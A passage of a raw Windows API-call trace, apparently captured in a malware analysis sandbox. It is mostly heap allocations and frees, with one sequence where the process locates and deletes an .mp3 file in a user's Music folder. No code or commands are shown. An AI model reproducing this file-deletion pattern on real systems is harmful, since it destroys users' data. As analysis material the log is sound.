hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.240] CloseHandle (hObject=0x298) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0117.243] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0117.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0117.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0117.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0117.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0117.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0117.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da350 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0117.250] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.250] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\ssO YlBHXom4.mp3", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\ssO YlBHXom4.mp3", lpFilePart=0x0) returned 0x4d [0117.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7a58 [0117.250] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\ssO YlBHXom4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\sso ylbhxom4.mp3")) returned 0x20 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a75c0 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4618 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4508 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a75c0 | out: hHeap=0x1780000) returned 1 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4618 | out: hHeap=0x1780000) returned 1 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.251] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\ssO YlBHXom4.mp3", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ab12ae0, ftCreationTime.dwHighDateTime=0x1d5efe8, ftLastAccessTime.dwLowDateTime=0xb730d540, ftLastAccessTime.dwHighDateTime=0x1d5e103, ftLastWriteTime.dwLowDateTime=0xb730d540, ftLastWriteTime.dwHighDateTime=0x1d5e103, nFileSizeHigh=0x0, nFileSizeLow=0x12108, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="ssO YlBHXom4.mp3", cAlternateFileName="SSOYLB~1.MP3")) returned 0x41ac6c0 [0117.252] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\ssO YlBHXom4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\sso ylbhxom4.mp3")) returned 1 [0117.293] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ab12ae0, ftCreationTime.dwHighDateTime=0x1d5efe8, ftLastAccessTime.dwLowDateTime=0xb730d540, ftLastAccessTime.dwHighDateTime=0x1d5e103, ftLastWriteTime.dwLowDateTime=0xb730d540, ftLastWriteTime.dwHighDateTime=0x1d5e103, nFileSizeHigh=0x0, nFileSizeLow=0x12108, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="ssO YlBHXom4.mp3", cAlternateFileName="SSOYLB~1.MP3")) returned 0 [0117.294] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4508 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7a58 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0117.294] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0117.294] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0117.295] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0117.295] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0117.295] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0117.295] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0117.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0117.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0117.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0117.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0117.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.296] 